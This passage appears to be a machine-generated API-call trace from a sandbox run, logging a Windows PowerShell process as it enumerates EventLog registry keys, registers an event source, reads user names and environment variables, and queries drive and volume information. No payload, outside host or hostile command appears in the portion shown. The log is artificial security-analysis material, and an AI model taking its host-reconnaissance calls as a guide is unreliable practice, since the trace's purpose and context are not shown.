	[0342.464] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.464] CoTaskMemFree (pv=0x245a70) 
	[0342.464] CoTaskMemFree (pv=0x0) 
	[0342.464] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.464] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.464] CoTaskMemFree (pv=0x245a70) 
	[0342.464] CoTaskMemFree (pv=0x0) 
	[0342.464] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.464] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.464] CoTaskMemFree (pv=0x245a70) 
	[0342.464] CoTaskMemFree (pv=0x0) 
	[0342.464] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.464] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.464] CoTaskMemFree (pv=0x245a70) 
	[0342.464] CoTaskMemFree (pv=0x0) 
	[0342.464] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.464] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.464] CoTaskMemFree (pv=0x245a70) 
	[0342.464] CoTaskMemFree (pv=0x0) 
	[0342.464] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.464] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.464] CoTaskMemFree (pv=0x245a70) 
	[0342.465] CoTaskMemFree (pv=0x0) 
	[0342.465] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.465] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x245a70, lpcchName=0x14d2c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d2c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.465] CoTaskMemFree (pv=0x245a70) 
	[0342.465] CoTaskMemFree (pv=0x0) 
	[0342.465] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x34c) returned 0x0
	[0342.465] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.465] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x358) returned 0x0
	[0342.465] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.465] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x35c) returned 0x0
	[0342.465] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.465] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x360) returned 0x0
	[0342.465] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.466] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x2e4) returned 0x0
	[0342.466] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.466] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x32c) returned 0x0
	[0342.466] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.466] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x1d0) returned 0x0
	[0342.466] RegOpenKeyExW (in: hKey=0x1d0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.466] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x1cc) returned 0x0
	[0342.466] RegOpenKeyExW (in: hKey=0x1cc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x0) returned 0x2
	[0342.466] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x31c) returned 0x0
	[0342.467] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d328 | out: phkResult=0x14d328*=0x330) returned 0x0
	[0342.467] RegCloseKey (hKey=0x330) returned 0x0
	[0342.467] RegCloseKey (hKey=0x354) returned 0x0
	[0342.467] RegCloseKey (hKey=0x31c) returned 0x0
	[0342.468] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d298 | out: phkResult=0x14d298*=0x31c) returned 0x0
	[0342.468] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d20c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d208, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d20c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d208*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.468] CoTaskMemFree (pv=0x0) 
	[0342.468] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.468] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x0, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.468] CoTaskMemFree (pv=0x245a70) 
	[0342.468] CoTaskMemFree (pv=0x0) 
	[0342.468] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.468] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x1, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.468] CoTaskMemFree (pv=0x245a70) 
	[0342.468] CoTaskMemFree (pv=0x0) 
	[0342.468] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.468] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x2, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.468] CoTaskMemFree (pv=0x245a70) 
	[0342.468] CoTaskMemFree (pv=0x0) 
	[0342.468] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.469] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x3, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.469] CoTaskMemFree (pv=0x245a70) 
	[0342.469] CoTaskMemFree (pv=0x0) 
	[0342.469] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.469] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x4, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.469] CoTaskMemFree (pv=0x245a70) 
	[0342.469] CoTaskMemFree (pv=0x0) 
	[0342.469] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.469] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x5, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.469] CoTaskMemFree (pv=0x245a70) 
	[0342.469] CoTaskMemFree (pv=0x0) 
	[0342.469] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.469] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x6, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.469] CoTaskMemFree (pv=0x245a70) 
	[0342.469] CoTaskMemFree (pv=0x0) 
	[0342.469] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.469] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x7, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.469] CoTaskMemFree (pv=0x245a70) 
	[0342.469] CoTaskMemFree (pv=0x0) 
	[0342.469] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.469] RegEnumKeyExW (in: hKey=0x31c, dwIndex=0x8, lpName=0x245a70, lpcchName=0x14d298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0342.470] CoTaskMemFree (pv=0x245a70) 
	[0342.470] CoTaskMemFree (pv=0x0) 
	[0342.470] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x354) returned 0x0
	[0342.470] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.470] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x330) returned 0x0
	[0342.470] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.470] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x334) returned 0x0
	[0342.470] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.470] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x338) returned 0x0
	[0342.470] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.470] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x33c) returned 0x0
	[0342.470] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.471] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x340) returned 0x0
	[0342.471] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.471] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x364) returned 0x0
	[0342.471] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.471] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x36c) returned 0x0
	[0342.471] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x0) returned 0x2
	[0342.471] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x370) returned 0x0
	[0342.471] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d2f8 | out: phkResult=0x14d2f8*=0x374) returned 0x0
	[0342.471] RegCloseKey (hKey=0x374) returned 0x0
	[0342.471] RegCloseKey (hKey=0x31c) returned 0x0
	[0342.472] RegCloseKey (hKey=0x370) returned 0x0
	[0342.476] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b920008
	[0342.551] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dbee18*="WSMan", lpRawData=0x2dbeb88) returned 1
	[0342.553] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0342.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.553] CoTaskMemFree (pv=0x1f7900) 
	[0342.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.556] CoTaskMemAlloc (cb=0x804) returned 0x1b755000
	[0342.556] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b755000, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0342.556] CoTaskMemFree (pv=0x1b755000) 
	[0342.556] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.556] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0342.556] CoTaskMemFree (pv=0x245a70) 
	[0342.557] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc47f8*="Alias", lpRawData=0x2dc4588) returned 1
	[0342.558] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0342.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.558] CoTaskMemFree (pv=0x1f7900) 
	[0342.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0342.560] CoTaskMemAlloc (cb=0x804) returned 0x1b755000
	[0342.560] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b755000, nSize=0x14d588 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d588) returned 0x1
	[0342.561] CoTaskMemFree (pv=0x1b755000) 
	[0342.561] CoTaskMemAlloc (cb=0x204) returned 0x245a70
	[0342.561] GetUserNameW (in: lpBuffer=0x245a70, pcbBuffer=0x14d5c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d5c8) returned 1
	[0342.562] CoTaskMemFree (pv=0x245a70) 
	[0342.562] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dc9df0*="Environment", lpRawData=0x2dc9b80) returned 1
	[0342.563] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0342.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0342.563] CoTaskMemFree (pv=0x1f7900) 
	[0342.564] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0342.564] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0342.564] CoTaskMemFree (pv=0x1f7900) 
	[0342.564] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0342.565] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0342.565] CoTaskMemFree (pv=0x1f7900) 
	[0342.565] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x14d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0342.565] SetErrorMode (uMode=0x1) returned 0x1
	[0342.565] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x14d340 | out: lpFileInformation=0x14d340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0342.565] SetErrorMode (uMode=0x1) returned 0x1
	[0342.566] GetLogicalDrives () returned 0x4
	[0342.567] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.567] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0342.567] SetErrorMode (uMode=0x1) returned 0x1
	[0342.568] CoTaskMemAlloc (cb=0x68) returned 0x1b724970
	[0342.568] CoTaskMemAlloc (cb=0x68) returned 0x1b724d60
	[0342.568] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b724970, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x14d310, lpMaximumComponentLength=0x14d30c, lpFileSystemFlags=0x14d308, lpFileSystemNameBuffer=0x1b724d60, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14d310*=0x9c354b42, lpMaximumComponentLength=0x14d30c*=0xff, lpFileSystemFlags=0x14d308*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0342.568] CoTaskMemFree (pv=0x1b724970) 
	[0342.568] CoTaskMemFree (pv=0x1b724d60) 
	[0342.568] SetErrorMode (uMode=0x1) returned 0x1
	[0342.568] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0342.569] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d050, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.569] SetErrorMode (uMode=0x1) returned 0x1
	[0342.569] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d2b0 | out: lpFileInformation=0x14d2b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0342.569] SetErrorMode (uMode=0x1) returned 0x1
	[0342.569] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14d050, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.569] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.569] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0342.569] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.570] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0342.570] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.570] SetErrorMode (uMode=0x1) returned 0x1
	[0342.570] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d0e0 | out: lpFileInformation=0x14d0e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0342.570] SetErrorMode (uMode=0x1) returned 0x1
	[0342.570] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.570] SetErrorMode (uMode=0x1) returned 0x1
	[0342.570] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14d0e0 | out: lpFileInformation=0x14d0e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0342.570] SetErrorMode (uMode=0x1) returned 0x1
	[0342.571] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0342.571] SetErrorMode (uMode=0x1) returned 0x1
